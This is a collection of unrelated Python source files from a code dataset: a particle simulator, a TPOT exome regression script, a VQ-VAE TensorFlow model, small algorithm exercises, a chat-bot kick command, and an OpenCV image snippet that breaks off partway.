plt.Circle(part.get_pos(), ((part.size/self.density)**(1/3))*sf, fill=True)\n plt.gca().add_artist(c)\n plt.pause(.001)\n\n def test(self):\n import pickle\n for i in range(300):\n pickle.loads(pickle.dumps(self))\n\n\nif __name__ == '__main__':\n destroy = []\n add = []\n uni = Universe(.9)\n # uni.xmin = -100000000\n # uni.xmax = 100000000\n # uni.ymin = -100000000\n # uni.ymax = 100000000\n # uni.parts.append(Particle(Vector(-100000000, 100000), 5*10**25, Vector(1, 0), uni.density))\n # uni.parts.append(Particle(Vector(100000000, -100000), 5*10**25, Vector(-1, 0), uni.density))\n uni.randomize(600, Vector(-1.5*(10**11), -1.5*(10**11)), Vector(1.5*(10**11), 1.5*(10**11)), Vector(-10, -10), Vector(10, 10), 10**23, 10**25)\n import timeit\n timeit.Timer()\n uni.run(100000)\n print('next')\n uni.test()\n print('done')\n #uni.par_run(1)\n #print(timeit.timeit(uni.par_run))\n #uni.par_run(numTicks=10000)","sub_path":"Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"268609078","text":"import os\nfrom itertools import combinations\nfrom pathlib import Path\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\nfrom tpot import TPOTRegressor\nfrom tpot.config import regressor_config_dict_light\n\n\ndef load_exome_data(data_folder, residuals):\n \"\"\"Load exome genotype data\"\"\"\n # Load Exome Data\n df_exome = pd.read_csv(\n f\"{data_folder}/Biobin_WES_3647_413_merged_full_SKAT_linear_bin_gene_MB-p_efvcnsgr2w48-bins.csv\")\n # Drop 1st 9 rows (not actual samples) and the existing phenotype column\n df_exome = df_exome.loc[9:, :].drop('p_efvcnsgr2w48', axis='columns')\n\n # Convert Exome IDs\n df_phenos = pd.read_csv(\n f\"{data_folder}/2017_12_12_WES_ID_map+2016_11_13_ACTG_MASTER_phenos_commonRPIDandVantageID.txt\",\n sep=\"\\t\")\n id_dict = df_phenos[['VANTAGENGSID', 'rpid']].set_index('VANTAGENGSID').to_dict()['rpid']\n df_exome['ID'] = df_exome['ID'].apply(lambda s: id_dict[s])\n df_exome = df_exome.set_index(\"ID\")\n\n # Log\n print(f\"Exome data: Loaded {len(df_exome):,} rows and {len(list(df_exome)):,} regions\")\n\n # Match 
residuals to data by ID\n exome = pd.merge(left=residuals, right=df_exome, how='inner', left_index=True, right_index=True)\n X_exome = exome.drop(residuals.name, axis='columns')\n y_exome = exome[residuals.name]\n exome_samples = len(y_exome)\n print(f\"{exome_samples:,} samples in exome data\")\n\n return X_exome, y_exome\n\n\ndef score_pipeline(pipeline, X, y, name, output_folder):\n \"\"\"Test the pipeline with data\"\"\"\n mse_scores = cross_val_score(pipeline, X, y, scoring='neg_mean_squared_error', cv=5)\n r2_scores = cross_val_score(pipeline, X, y, scoring='r2', cv=5)\n print(\"5-fold Cross-Validation Scores\")\n print(f\"\\tNegative MSE = {mse_scores.mean()} Average ({', '.join([str(n) for n in mse_scores])})\")\n print(f\"\\tR^2 = {r2_scores.mean()} Average ({', '.join([str(n) for n in r2_scores])})\")\n\n # Get CV Predictions\n results = pd.DataFrame({'predicted': cross_val_predict(pipeline, X, y, cv=5),\n 'actual': y})\n\n # Plot CV Predictions\n ax = sns.scatterplot(x=\"actual\", y=\"predicted\", data=results, alpha=0.5)\n\n # Add diagonal that is +/- 10% of the min/max range\n min_range = results[['actual', 'predicted']].min(axis=1).min() * 0.9\n max_range = results[['actual', 'predicted']].max(axis=1).max() * 1.1\n ax.plot([min_range, max_range], [min_range, max_range], lw=1, color='black')\n\n # Title\n ax.set_title(name)\n\n # Save\n plt.savefig(output_folder + f\"/{name}.png\")\n print(f\"Saved {name} plot\")\n plt.clf() # Clear in case more plots are made later\n\nexisting_file = click.Path(exists=True, file_okay=True, dir_okay=False, readable=True)\n\n@click.command()\n@click.argument('phenotype', type=click.STRING)\n@click.option('--population', type=click.INT, default=100)\n@click.option('--generations', type=click.INT, default=None)\n@click.option('--gene_set_file', type=existing_file, default=None) # For FSS\n@click.option('--gene_set_count', type=click.INT, default=None) # For FSS\n@click.option('--random_seed', type=click.INT, default=1855)\n@click.option('--max_time_mins', type=click.INT, default=None)\n@click.option('--checkpoint_folder', type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True))\n@click.option('--output_folder', type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True), default=\".\")\ndef run_analysis(phenotype, population, generations, gene_set_file, gene_set_count, random_seed, max_time_mins, checkpoint_folder, output_folder):\n # Either generations or max_time_mins must be specified\n if generations is None and max_time_mins is None:\n raise ValueError(\"Either 'generations' or 'max_time_mins' must be specified\")\n\n # Folders\n current_folder = str(Path(os.path.realpath(__file__)).parent) # folder containing this script\n data_folder = current_folder + \"/data\"\n\n # Load residuals\n residuals_file = data_folder + f\"/residuals/{phenotype}_residuals.txt\"\n residuals = pd.read_csv(residuals_file, sep=\"\\t\", index_col='ID', squeeze=True)\n print(\"Loaded residuals\")\n\n # Load genotype data\n X_exome, y_exome = load_exome_data(data_folder, residuals)\n print(\"Loaded genotype data\")\n\n # Load fss options\n if gene_set_file is None:\n raise ValueError(\"A gene_set_file must be specified when using FSS\")\n else:\n gene_set_file = str(gene_set_file) # Must be string when passed to TPOT\n if gene_set_count is None:\n raise ValueError(\"A gene_set_count must be specified when using FSS\")\n available_subset_num = len(open(gene_set_file).readlines())\n sel_subset = list(range(available_subset_num))\n if 
gene_set_count > 1:\n        # Update sel_subset to be all possible combinations\n        sel_subset = list(combinations(sel_subset, gene_set_count))\n    fss_options = {'subset_list': [gene_set_file],\n                   'sel_subset': sel_subset}\n    regressor_config_dict_light['tpot.builtins.FeatureSetSelector'] = fss_options\n\n    # Print what settings are being used\n    print(\"Running TPOT\")\n    print(f\"\\tPhenotype = {residuals.name}\")\n    print(f\"\\tPopulation = {population}\")\n    # FSS\n    print(\"\\tFSS settings:\")\n    print(f\"\\t\\tfile = {gene_set_file} (contains {available_subset_num:,} sets)\")\n    print(f\"\\t\\t{gene_set_count} set(s) chosen at a time ({len(fss_options['sel_subset']):,} combinations)\")\n\n    # Define template\n    template = 'FeatureSetSelector-Transformer-Regressor'\n\n    # Optimize Pipeline\n    pipeline_optimizer = TPOTRegressor(generations=generations,\n                                       population_size=population,\n                                       max_time_mins=max_time_mins,\n                                       verbosity=2,\n                                       config_dict=regressor_config_dict_light,\n                                       template=template,\n                                       periodic_checkpoint_folder=checkpoint_folder,\n                                       early_stop=None,\n                                       random_state=random_seed,\n                                       n_jobs=-1)\n    print(\"=\" * 30)\n    print(\"Starting Training...\")\n    pipeline_optimizer.fit(X_exome, y_exome)\n\n    # Save pipeline\n    pipeline_optimizer.export(output_folder + f\"/{phenotype}_pipeline.py\")\n\n    # Score pipeline and save results\n    pipeline = pipeline_optimizer.fitted_pipeline_\n    score_pipeline(pipeline, X_exome, y_exome, name=f\"exome_{phenotype}_results\", output_folder=output_folder)\n\n\nif __name__ == '__main__':\n    run_analysis()\n","sub_path":"scripts/run_tpot_exome_residuals.py","file_name":"run_tpot_exome_residuals.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491943840","text":"import os\nimport requests\nimport json\n\n\nAPI_URL = 'http://127.0.0.1:8001/'\nMAX_RETRIES = 60\n\n\ndef draw(filename):\n    values = {\n        \"rectangles\": [\n            {\n                \"x\": 100,\n                \"y\": 100,\n                \"w\": 100,\n                \"h\": 200\n            },\n            {\n                \"x\": 300,\n                \"y\": 300,\n                \"w\": 100,\n                \"h\": 200\n            },\n            {\n                \"x\": 200,\n                \"y\": 200,\n                \"w\": 100,\n                \"h\": 200\n            }\n        ]\n    }\n\n    files = {'file': (filename, open(filename, 'rb'), 'image/jpeg', {})}\n    json_str = json.dumps(values)\n    response = requests.post(API_URL + \"drawing/draw\", files=files, data={\"json\": json_str}, stream=True)\n    if response.status_code == 200:\n        with open('output.jpg', 'wb+') as f:\n            f.write(response.raw.data)\n    else:\n        print(response.status_code, response.reason)\n\n\nif __name__ == '__main__':\n    draw('input.jpg')\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247293466","text":"\"\"\"\nFrom: https://oj.leetcode.com/problems/merge-intervals/\nAuthor: Jing Zhou\nDate: Sep 12, 2014\nThought: Sort then merge, easy\nTags: sort, list, sorted\n\"\"\"\n\nimport operator\n\n\n# Definition for an interval.\n# class Interval:\n#     def __init__(self, s=0, e=0):\n#         self.start = s\n#         self.end = e\n\nclass Solution:\n    # @param intervals, a list of Interval\n    # @return a list of Interval\n    def merge(self, intervals):\n        if not intervals or len(intervals) == 1:\n            return intervals\n        # or use key = lambda x: x.start\n        intervals = sorted(intervals, key=operator.attrgetter('start'))\n        res = [intervals[0]]\n        for i in range(1, len(intervals)):\n            if intervals[i].start <= res[-1].end:\n                res[-1].end = max(res[-1].end, intervals[i].end)\n            else:\n                res.append(intervals[i])\n        return 
res\n","sub_path":"week24/Jing/p_merge_interval.py","file_name":"p_merge_interval.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326898418","text":"def has_negatives(a):\n    \"\"\"\n    Return the positive value of every (i, -i) pair that appears in a.\n    \"\"\"\n    # Record every value seen so far for O(1) membership checks\n    cache = {}\n    results = []\n    for i in a:\n        cache[i] = i\n\n        # Skip zero, then check whether the opposite-signed value was seen\n        if i != 0 and -i in cache:\n            if i > 0:\n                results.append(i)\n            else:\n                results.append(-i)\n\n    return results\n\n\nif __name__ == \"__main__\":\n    print(has_negatives([-1, -2, 1, 2, 3, 4, -4]))\n","sub_path":"hashtables/ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"568067006","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom collections import defaultdict\nfrom itertools import chain\nfrom scipy.spatial.distance import cosine\nfrom scipy.stats import spearmanr\n\nfrom wikipedia2vec import Wikipedia2Vec\n\nENTITY_CATEGORIES = {\n    'it_companies': ['Apple Inc.', 'Google', 'Facebook', 'Microsoft', 'IBM'],\n    'celebrities': ['Angelina Jolie', 'Brad Pitt', 'Johnny Depp', 'Jennifer Aniston', 'Leonardo DiCaprio'],\n    'video_games': ['Grand Theft Auto IV', 'Quake (video game)', 'Deus Ex (series)', 'Guitar Hero (video game)', 'Max Payne'],\n    'tv_series': ['The Sopranos', 'The A-Team', 'Futurama', 'The Wire', 'Mad Men'],\n    'chuck_norris': ['Chuck Norris'],\n}\n\n\ndef evaluate_on_Kore(w, dataset_file=\"web/datasets/rankedrelatedentities.txt\"):\n    dataset_obj = parse_dataset(dataset_file)\n\n    results = defaultdict(list)\n    category_mapping = {\n        e: c for (c, l) in ENTITY_CATEGORIES.items() for e in l}\n\n    for (title1, title_list) in dataset_obj.items():\n        pred = []\n        title_pairs = [title1]\n\n        title1 = convert_title(title1).lower()\n        try:\n            vec1 = w[title1]\n        except KeyError:\n            print('Missing entity:' + title1)\n            pred.append(0.0)\n            continue\n\n        for title2 in title_list:\n            title_pairs.append(title2)\n            title2 = convert_title(title2).lower()\n            try:\n                vec2 = w[title2]\n            except KeyError:\n                print('Missing entity:' + title2)\n                pred.append(0.0)\n                continue\n\n            score = 1.0 - cosine(vec1, vec2)\n            pred.append(score)\n\n        correct = list(reversed(range(len(pred))))\n        results[category_mapping[title_pairs[0]]].append(\n            spearmanr(correct, pred)[0])\n\n    print(results)\n\n    return results\n\n\ndef convert_title(title):\n    title_tokens = title.split()\n    if len(title_tokens) == 1:\n        return \"ENTITY/\" + title_tokens[0]\n    else:\n        return \"ENTITY/\" + \"_\".join(title_tokens)\n\n\ndef parse_dataset(dataset_file_path):\n    target = None\n    dataset_obj = defaultdict(list)\n    f = open(dataset_file_path)\n    dataset_file = f.readlines()\n    for line in dataset_file:\n        line = line.rstrip()\n        if line.startswith('\\t'):\n            dataset_obj[target].append(line[1:])\n        else:\n            target = line\n\n    return dataset_obj\n","sub_path":"web/kore_evaluate.py","file_name":"kore_evaluate.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327102971","text":"# Write a program that reads an integer and then prints to the console\n# a \"Christmas tree\" of `*` characters in that many lines. E.g. 
for parameter 3 it should print:\n#\n# ```\n# *\n# * * *\n# * * * * *\n\n\nfrom random import randint\n\nx = randint(5, 10)\n\nprint(f\"\\nThe Christmas tree will consist of {x} lines.\")\n\n\n\n# Use a separate loop variable so that x (the number of lines) is not shadowed\nfor row in range(1, x + 1):\n\n    i = ((row * 2) - 1)\n\n    tree = (i * \"* \")\n\n    print(f\"{tree:^40}\")\n\n\n\n\n","sub_path":"zad_2_2.py","file_name":"zad_2_2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150820331","text":"import xmppUtils\n\ncommandText = 'kick'\nhelpText = 'Kick the specified user.'\n\ndef process(sender, type, args, client):\n\tcomSend = sender.getResource()\n\troom = sender.getStripped()\n\tif xmppUtils.isModerator(room, comSend):\n\t\tif len(args) > 0:\n\t\t\tsenderNick = sender.getResource()\n\t\t\txmppUtils.setRole(room, args, 'none', '...cause the kickin\\' boot has granted its powers to %s' %(comSend))","sub_path":"commands/kick.py","file_name":"kick.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"30907403","text":"# -*- coding: utf-8 -*-\n\nimport disco\nfrom disco.core import Job, result_iterator\n\ndef map(line, params):\n    columns = line.split()\n    party = columns[1]\n    yield party, 1\n\ndef reduce(iter, params):\n    from disco.util import kvgroup\n    for party, counts in kvgroup(sorted(iter)):\n        yield party, sum(counts)\n\nif __name__ == '__main__':\n    job = Job().run(input=[\"data:tweets\"], map_reader = disco.worker.task_io.chain_reader, map=map, reduce=reduce)\n    with open('TweetStats.txt', 'w') as f:\n        for party_word, count in result_iterator(job.wait(show=True)):\n            f.write(party_word + '\\t' + str(count) + '\\n')\n        f.close()\n","sub_path":"CalculateTweetStats.py","file_name":"CalculateTweetStats.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650427919","text":"import os\nimport tensorflow as tf\nimport math\nimport numpy as np\nfrom functools import partial\nimport VQVAE_ema_module\n\nclass CoordConv2D:\n    def __init__(self, with_r = False):\n        self.with_r = with_r\n    def __call__(self,input):\n        self.x_dim = input.shape.as_list()[2]\n        self.y_dim = input.shape.as_list()[1]\n        batch_size_tensor = tf.shape(input)[0]\n        xy_vector = tf.ones([self.y_dim,1])\n        yx_vector = tf.ones([1,self.x_dim])\n        x_range = tf.reshape(tf.range(1,self.x_dim+1,1,dtype=tf.float32),[1,self.x_dim])\n        y_range = tf.reshape(tf.range(1,self.y_dim+1,1,dtype=tf.float32),[self.y_dim,1])\n        x_normal_range = tf.multiply(x_range,1/self.x_dim)\n        y_normal_range = tf.multiply(y_range,1/self.y_dim)\n        x_mat = tf.matmul(xy_vector,x_normal_range)\n        y_mat = tf.matmul(y_normal_range,yx_vector)\n\n        x_mat = tf.reshape(x_mat,[1,self.y_dim,self.x_dim,1])\n        y_mat = tf.reshape(y_mat,[1,self.y_dim,self.x_dim,1])\n        x_mats = tf.tile(x_mat,[batch_size_tensor,1,1,1])\n        y_mats = tf.tile(y_mat,[batch_size_tensor,1,1,1])\n\n\n        \n        if self.with_r == True:\n            # # origin\n            # r = ((x_mats-0.5)**2 + (y_mats-0.5)**2)\n            # r = tf.sqrt(r)\n\n            # I test \n            r = (tf.sqrt((x_mats-0.5)**2) + tf.sqrt((y_mats-0.5)**2))\n\n            input = tf.concat([input,x_mats,y_mats,r],axis=-1)\n            return input\n        else:\n            input = tf.concat([input,x_mats,y_mats],axis=-1)\n            return input\n\n\nclass MODEL:\n    defalt_data_img_holder = tf.placeholder(tf.float32, [None, 72 * 2, 128 * 2, 3], \"default_data_img_holder\")\n\n    def __init__(self, LR, filter_num, batch_size, latent_size, 
latent_base, attention_head_num):\n self.LR = LR\n self.filter_num = filter_num\n self.batch_size = batch_size\n self.latent_size = latent_size\n self.latent_base = latent_base\n self.kernel = tf.keras.initializers.glorot_normal()\n self.attention_head_num = attention_head_num\n\n global_step = tf.Variable(0, trainable=False)\n\n # learning_rate = tf.train.exponential_decay(self.LR, global_step, 10000, 0.96, staircase=True)\n learning_rate = self.LR\n\n # place holders\n # self.ori_x = tf.placeholder(tf.string, [None])\n self.ori_x = tf.placeholder(tf.float32, [None, 28,28],name=\"ori_x_holder\")\n\n self.ori_y = tf.placeholder(tf.string, [None])\n self.keep_training = tf.placeholder_with_default(True, shape=())\n # data_img_holder = tf.placeholder(tf.float32, [None, 28, 28, 1], \"default_data_img_holder\")\n # self.data_img_holder = tf.multiply(data_img_holder,1/255,\"input_regularize\")\n self.data_img_holder = tf.placeholder(tf.float32, [None, 28, 28, 1], \"default_data_img_holder\")\n self.reg_data_img_holder = self.data_img_holder/255\n\n dataset = tf.data.Dataset.from_tensor_slices(self.ori_x)\n dataset = dataset.batch(self.batch_size, drop_remainder=True)\n dataset = dataset.apply(tf.contrib.data.shuffle_and_repeat(buffer_size=10))\n dataset = dataset.prefetch(10)\n self.dataset_iter = dataset.make_initializable_iterator()\n self.dataset_prefetch = tf.reshape(self.dataset_iter.get_next(),[-1, 28, 28, 1])\n\n self.gray_data_img = self.reg_data_img_holder\n\n self.main(self.gray_data_img, training_status=self.keep_training)\n\n self.loss = self.loss_function()\n\n optimizer = tf.train.RMSPropOptimizer(learning_rate, momentum=.9, centered=True)\n\n self.train_op = optimizer.minimize(self.loss)\n\n # built reconstruct_img\n \n\n def short_cut_layer(self, enc_layer, dec_layer):\n short_cut1_H_x = tf.keras.layers.Conv2D(1, kernel_size=3, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(enc_layer)\n\n short_cut1_H_x = tf.keras.layers.Conv2D(dec_layer.shape.as_list()[-1], kernel_size=3, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(\n short_cut1_H_x)\n\n expand_dec_layer = tf.concat([short_cut1_H_x, dec_layer], axis=3)\n\n return expand_dec_layer\n\n def main(self, img, training_status):\n with tf.variable_scope(\"vea_autoencoder\", reuse=tf.AUTO_REUSE):\n # l1 output => l8 input\n # l2 output => l7 input\n # l3 output => l6 input\n # l4 output => l5 input\n\n # encoder\n\n # print(\"img:\", img)\n\n # level1\n\n # level1\n\n # img_with_Cord = CoordConv2D(with_r = False)(img)\n\n\n l1_output = tf.keras.layers.Conv2D(self.filter_num, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(img)\n l1_output = tf.keras.layers.Conv2D(self.filter_num, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l1_output)\n\n print(\"l1_output:\", l1_output)\n\n # level2\n\n l2_raw_output = tf.keras.layers.MaxPool2D(pool_size=2, padding=\"SAME\")(l1_output)\n\n\n l2_output = tf.keras.layers.Conv2D(self.filter_num * 2, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l2_raw_output)\n l2_output = tf.keras.layers.Conv2D(self.filter_num * 2, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l2_output)\n print(\"l2_output:\", l2_output)\n\n # level3\n\n l3_raw_output = tf.keras.layers.MaxPool2D(pool_size=2, padding=\"SAME\")(l2_output)\n\n l3_output = 
tf.keras.layers.Conv2D(self.filter_num * 3, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l3_raw_output)\n l3_output = tf.keras.layers.Conv2D(self.latent_base, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=tf.initializers.he_normal())(l3_output)\n\n print(\"l3_output:\", l3_output)\n\n img_shape = l3_output.shape\n\n\n with tf.variable_scope(\"top_VQVAE\"):\n top_VQVAE_instance = VQVAE_ema_module.VQVAE(l3_output, self.latent_size, 0.25, \"top_VQVAE\")\n top_VQ_out_dict = top_VQVAE_instance.VQVAE_layer_out()\n\n top_VQ_out = top_VQ_out_dict['quantized_embd_out']\n self.top_VQ_loss = top_VQ_out_dict[\"VQ_loss\"]\n self.top_VQ_encodings = top_VQ_out_dict[\"encodings\"]\n self.top_VQ_assign_moving_avg_op = top_VQ_out_dict['assign_moving_avg_op']\n self.top_VQ_temp_decay_op = top_VQ_out_dict[\"temp_decay_op\"]\n self.top_k_idx = top_VQ_out_dict[\"top_k_idx\"]\n\n # print(\"top_VQ_out:\", top_VQ_out)\n\n # unflatten_ouput = VQ_out\n #\n # print(\"unflatten_ouput:\", unflatten_ouput)\n\n channel_reconstruct = tf.keras.layers.Dense(img_shape[-1],\n kernel_initializer=tf.keras.initializers.glorot_normal())(\n top_VQ_out)\n print(\"channel_reconstruct:\", channel_reconstruct)\n\n\n # level 4\n l4_raw_output = tf.keras.layers.Conv2DTranspose(self.filter_num * 2, kernel_size=3, strides=2, padding=\"SAME\",\n kernel_initializer=self.kernel, activation=tf.nn.tanh)(channel_reconstruct)\n\n l4_output = tf.keras.layers.Conv2D(self.filter_num * 2, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l4_raw_output)\n l4_output = tf.keras.layers.Conv2D(self.latent_base, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l4_output)\n\n resize_top_VQ_out = tf.keras.layers.UpSampling2D(2, interpolation='bilinear')(top_VQ_out)\n\n bottom_input = tf.concat([l4_output, resize_top_VQ_out], axis=3)\n\n bottom_input = tf.keras.layers.Dense(bottom_input.get_shape().as_list()[-1],activation=\"tanh\", kernel_initializer=tf.initializers.he_normal())(bottom_input)\n\n with tf.variable_scope(\"bottom_VQVAE\"):\n bottom_VQVAE_instance = VQVAE_ema_module.VQVAE(bottom_input, self.latent_size, 0.25,\n \"bottom_VQVAE\")\n bottom_VQ_out_dict = bottom_VQVAE_instance.VQVAE_layer_out()\n bottom_VQ_out = bottom_VQ_out_dict['quantized_embd_out']\n self.bottom_VQ_loss = bottom_VQ_out_dict[\"VQ_loss\"]\n self.bottom_VQ_encodings = bottom_VQ_out_dict[\"encodings\"]\n self.bottom_VQ_assign_moving_avg_op = bottom_VQ_out_dict['assign_moving_avg_op']\n self.bottom_VQ_temp_decay_op = bottom_VQ_out_dict[\"temp_decay_op\"]\n\n print(\"bottom_VQ_out:\", bottom_VQ_out)\n\n bottom_VQ_out = tf.concat([bottom_VQ_out, resize_top_VQ_out], axis=3)\n\n print(\"bottom_VQ_out:\", bottom_VQ_out)\n\n # level8\n l5_raw_output = tf.keras.layers.Conv2DTranspose(self.filter_num * 1, kernel_size=3, strides=2, padding=\"SAME\",\n kernel_initializer=self.kernel, activation=tf.nn.tanh)(bottom_VQ_out)\n\n l5_output = tf.keras.layers.Conv2D(self.filter_num * 1, kernel_size=3, strides=1,\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l5_raw_output)\n l5_output = tf.keras.layers.Conv2D(self.filter_num * 1, kernel_size=3, strides=1, activation=\"tanh\",\n padding=\"SAME\",\n kernel_initializer=self.kernel)(l5_output)\n\n print(\"l5_output:\",l5_output)\n\n\n # reconstruct layer\n\n recon_out = tf.keras.layers.Conv2D(32, kernel_size=3, strides=1, padding=\"SAME\", activation=\"sigmoid\",\n kernel_initializer=self.kernel)(l5_output)\n 
recon_out = tf.keras.layers.Conv2D(1, kernel_size=3, strides=1, padding=\"SAME\",\n kernel_initializer=self.kernel, activation=\"sigmoid\")(recon_out)\n self.reg_recon_out = recon_out\n self.recon_output = tf.cast(tf.round(recon_out * 255), tf.float32)\n\n # print(\"seg_map:\", seg_map.shape)\n # print((\"recon_out:\", recon_out))\n\n \n\n def loss_function(self):\n # reconstruct loss\n # data_img = (self.data_img + 1) * .5 # from -1~1 to 0~1\n\n # print(\"data_img:\",data_img)\n print(\"self.recon_output:\",self.recon_output)\n\n self.reconstruct_loss = tf.reduce_mean(tf.squared_difference(self.reg_data_img_holder, self.reg_recon_out), axis=[1, 2, 3])\n\n self.logpx_z = self.reconstruct_loss\n\n return tf.reduce_mean(self.logpx_z) + self.bottom_VQ_loss + self.top_VQ_loss\n\n def oct_conv_first_layer(self, x, channel_num, alpha, kernel_size=3, activation=tf.nn.tanh):\n H_channel_num = int(channel_num * alpha // 1) # by alpha, I split channel to high freq and low freq chuncks\n L_channel_num = channel_num - H_channel_num\n\n H_x = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal(),\n activation=activation)(x)\n\n # since low freq catch the spatial stucture rather than catching detail, we use pooling on Low freq parts\n L_pooling = tf.keras.layers.AveragePooling2D(pool_size=2, strides=2, padding='SAME')(x)\n L_x = tf.keras.layers.Conv2D(L_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal(),\n activation=activation)(L_pooling)\n\n return H_x, L_x\n\n def oct_conv_block(self, H_x, L_x, channel_num, alpha, kernel_size=3, activation=tf.nn.tanh):\n H_channel_num = int(channel_num * alpha // 1) # by alpha, I split channel to high freq and low freq chuncks\n L_channel_num = channel_num - H_channel_num\n\n H2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(H_x)\n\n # # dilation add-on\n # H2dilation = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # dilation_rate=2,\n # kernel_initializer=tf.keras.initializers.glorot_normal())(H_x)\n # H2H = tf.concat([H2H, H2dilation], axis=3)\n # H2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # kernel_initializer=tf.keras.initializers.glorot_normal())(H2H)\n\n H2L = tf.keras.layers.AveragePooling2D(pool_size=2, strides=2, padding='SAME')(H_x)\n H2L = tf.keras.layers.Conv2D(L_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(H2L)\n\n L2L = tf.keras.layers.Conv2D(L_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(L_x)\n\n # upsampling to H freq parts size\n L2H_raw = tf.keras.layers.UpSampling2D(2, interpolation='bilinear')(L_x)\n L2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(L2H_raw)\n\n # # dilation add-on\n # L2dilation = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n # dilation_rate=2,\n # kernel_initializer=tf.keras.initializers.glorot_normal())(L2H_raw)\n # L2H = tf.concat([L2H, L2dilation], axis=3)\n # L2H = tf.keras.layers.Conv2D(H_channel_num, kernel_size=kernel_size, 
strides=1, padding=\"SAME\",\n # kernel_initializer=tf.keras.initializers.glorot_normal())(L2H)\n\n return activation((H2H + L2H) / 2), activation((L2L + H2L) / 2)\n\n def oct_conv_final_layer(self, H_x, L_x, channel_num, kernel_size=3, activation=tf.nn.tanh):\n L2H = tf.keras.layers.UpSampling2D(2, interpolation='bilinear')(L_x)\n L2H = tf.keras.layers.Conv2D(channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(L2H)\n H2H = tf.keras.layers.Conv2D(channel_num, kernel_size=kernel_size, strides=1, padding=\"SAME\",\n kernel_initializer=tf.keras.initializers.glorot_normal())(H_x)\n\n return activation((H2H + L2H) / 2)\n","sub_path":"VQVAE/EMA_slice_vector/VQVAE_ema_model.py","file_name":"VQVAE_ema_model.py","file_ext":"py","file_size_in_byte":15908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"644449803","text":"import sys\n\ndef calculate(h, word):\n lettersList = {}\n i = 0\n for letter in range(97, 123):\n lettersList[chr(letter)] = h[i]\n i += 1\n maxValue = 1\n for character in word:\n if lettersList[character] > maxValue:\n maxValue = lettersList[character]\n return len(word) * maxValue\nh = list(map(int, input().strip().split(' ')))\nword = input().strip()\nprint(calculate(h, word))\n","sub_path":"hackerrank/designerPDFReader.py","file_name":"designerPDFReader.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122675258","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('FFF03A_1.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# save image with lower quality—smaller file size\ncv2.imwrite('FFF_compressed.jpg', img, [cv2.IMWRITE_JPEG_QUALITY, 9])\n\n# read the compressed image\nimg = cv2.imread('FFF_compressed.jpg')\n# convert the colored image into gray one\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# Use Sobel kernel to find the contours\ngradX = 